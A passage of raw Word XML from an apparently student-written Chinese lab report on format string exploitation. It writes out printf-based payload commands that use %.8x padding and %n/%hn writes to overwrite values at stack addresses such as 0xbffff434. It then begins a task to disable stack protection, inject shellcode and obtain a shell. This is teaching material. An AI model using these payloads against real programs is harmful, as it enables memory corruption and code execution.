      <w:r w:rsidR="00AC4FA1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00100033" w:rsidRPr="00100033">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1,720,219,504</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2CC371" w14:textId="77777777" w:rsidR="00922761" w:rsidRDefault="0052677E" w:rsidP="00E778AF">
      <w:pPr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所以构建指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E38AF47" w14:textId="132563EB" w:rsidR="00646C5C" w:rsidRDefault="00922761" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00922761">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>echo $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00922761">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00922761">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> "\x34\xf4\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00922761">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00922761">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00922761">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xbf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00922761">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>").%</w:t>
      </w:r>
      <w:r w:rsidR="002F3FE6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.8</w:t>
      </w:r>
      <w:r w:rsidRPr="00922761">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>x.%</w:t>
      </w:r>
      <w:r w:rsidR="002F3FE6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.8</w:t>
      </w:r>
      <w:r w:rsidRPr="00922761">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>x.%</w:t>
      </w:r>
      <w:r w:rsidR="002F3FE6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.8</w:t>
      </w:r>
      <w:r w:rsidRPr="00922761">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>x.%</w:t>
      </w:r>
      <w:r w:rsidR="002F3FE6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.8</w:t>
      </w:r>
      <w:r w:rsidRPr="00922761">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>x.%</w:t>
      </w:r>
      <w:r w:rsidR="00AC4FA1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006905CA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1720219504x</w:t>
      </w:r>
      <w:r w:rsidRPr="00922761">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.%n &gt; input.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C76FC86" w14:textId="538ACDB9" w:rsidR="005A0292" w:rsidRDefault="005A0292" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing w:line="24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0F03029C" wp14:editId="4E25BE66">
            <wp:extent cx="4114424" cy="242773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321" cy="24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871A" w14:textId="41680549" w:rsidR="00646C5C" w:rsidRDefault="002B4016" w:rsidP="00E778AF">
      <w:pPr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但是这样的速度很慢，所以利用%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>或者%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hhn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>来实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A03BEF" w14:textId="77777777" w:rsidR="002B4016" w:rsidRPr="007647DD" w:rsidRDefault="002B4016" w:rsidP="002B401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647DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007647DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>n :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007647DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Treats argument as a 4-byte integer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A03265" w14:textId="77777777" w:rsidR="00357E90" w:rsidRDefault="002B4016" w:rsidP="002B401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647DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007647DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007647D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7647DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Treats argument as a 2-byte short integer. Overwrites only 2 significant bytes of the argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9FA9F8" w14:textId="2495DF31" w:rsidR="002B4016" w:rsidRPr="007647DD" w:rsidRDefault="002B4016" w:rsidP="002B401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647DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007647DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hhn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007647D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7647DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Treats argument as a 1-byte char type. Overwrites the least significant byte of the argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9115C3" w14:textId="77777777" w:rsidR="00A87BF3" w:rsidRPr="00A87BF3" w:rsidRDefault="00A87BF3" w:rsidP="00A87BF3">
      <w:pPr>
        <w:spacing w:before="0" w:after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7BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>长度修饰符可被使用在规定符中来限定输出的整型参数的类型，当使用在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>%n</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上时，他控制把参数当作多少个字节的整数，在允许加</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>%n</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的众多修饰符选项中，重点关注以下几点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFCE641" w14:textId="77777777" w:rsidR="00A87BF3" w:rsidRPr="00A87BF3" w:rsidRDefault="00A87BF3" w:rsidP="00A87BF3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="18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87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%n</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：视参数为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>字节整型数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301A34BD" w14:textId="77777777" w:rsidR="00A87BF3" w:rsidRPr="00A87BF3" w:rsidRDefault="00A87BF3" w:rsidP="00A87BF3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="18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87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：视参数为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>字节短整型数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78660A80" w14:textId="77777777" w:rsidR="00A87BF3" w:rsidRPr="00A87BF3" w:rsidRDefault="00A87BF3" w:rsidP="00A87BF3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="18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87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hhn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：视参数为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>字节字符型数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4970DE" w14:textId="6BABF064" w:rsidR="00646C5C" w:rsidRDefault="005A0292" w:rsidP="00E778AF">
      <w:pPr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即</w:t>
      </w:r>
      <w:r w:rsidR="003C764E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>地址为0x</w:t>
      </w:r>
      <w:r w:rsidR="003C764E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bffff434</w:t>
      </w:r>
      <w:r w:rsidR="003C764E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的两字节被修改为0x</w:t>
      </w:r>
      <w:r w:rsidR="003C764E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7799 </w:t>
      </w:r>
      <w:r w:rsidR="003C764E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，地址为0x</w:t>
      </w:r>
      <w:r w:rsidR="003C764E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bffff436</w:t>
      </w:r>
      <w:r w:rsidR="003C764E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的两个字节被修改为0x6688</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E32214B" w14:textId="71D75AF7" w:rsidR="00FF39CF" w:rsidRDefault="00994D42" w:rsidP="00E778AF">
      <w:pPr>
        <w:spacing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所以构建指令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC9A2C0" w14:textId="2FC2551F" w:rsidR="00994D42" w:rsidRDefault="00245B43" w:rsidP="00245B43">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00534369">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>echo $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00534369">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00534369">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> "\x</w:t>
      </w:r>
      <w:r w:rsidR="007168CB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r w:rsidRPr="00534369">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>\xf</w:t>
      </w:r>
      <w:r w:rsidR="007168CB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00534369">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>\xff\xbf@@@@\x</w:t>
      </w:r>
      <w:r w:rsidR="007168CB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
      <w:r w:rsidRPr="00534369">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>\xf</w:t>
      </w:r>
      <w:r w:rsidR="007168CB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00534369">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>\xff\xbf</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00534369">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>")%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00534369">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.8x%.8x%.8x%.8x%.26204x%hn%.4369x%hn &gt; input</w:t>
      </w:r>
      <w:r w:rsidR="00E30969">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D484D98" w14:textId="3258DFC2" w:rsidR="00B41DAB" w:rsidRDefault="00B41DAB" w:rsidP="00276904">
      <w:pPr>
        <w:spacing w:line="24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C5CB826" wp14:editId="61958D0A">
            <wp:extent cx="4061494" cy="272412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838" cy="27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0407" w14:textId="6017182B" w:rsidR="002E2CFA" w:rsidRDefault="00E44C2A" w:rsidP="00E44C2A">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00E44C2A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>任务</w:t>
      </w:r>
      <w:r w:rsidRPr="00E44C2A">
        <w:t>2：针对prog2，完成以下任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560D5B61" w14:textId="30B37FC0" w:rsidR="00BF7B52" w:rsidRPr="00BF7B52" w:rsidRDefault="003A6F1A" w:rsidP="00BF7B52">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars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7B52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BF7B52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BF7B52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>不可执行保护，通过注入并执行 shellcode 进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7B52">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>利用，获得</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7B52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FE2850" w14:textId="77777777" w:rsidR="00BF7B52" w:rsidRPr="00BF7B52" w:rsidRDefault="00BF7B52" w:rsidP="00BF7B52">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54741B2E" w14:textId="59777CDE" w:rsidR="00BF7B52" w:rsidRPr="005B0EC7" w:rsidRDefault="00BF7B52" w:rsidP="00BF7B52">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto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B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为了利用格式化字符串漏洞注入代码，需要应对</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>个挑战。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0543974B" w14:textId="77777777" w:rsidR="00BF7B52" w:rsidRPr="005B0EC7" w:rsidRDefault="00BF7B52" w:rsidP="00BF7B52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="30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B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注入恶意代码到</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0FDB16" w14:textId="77777777" w:rsidR="00BF7B52" w:rsidRPr="005B0EC7" w:rsidRDefault="00BF7B52" w:rsidP="00BF7B52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="30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B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>找到恶意代码的起始地址</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
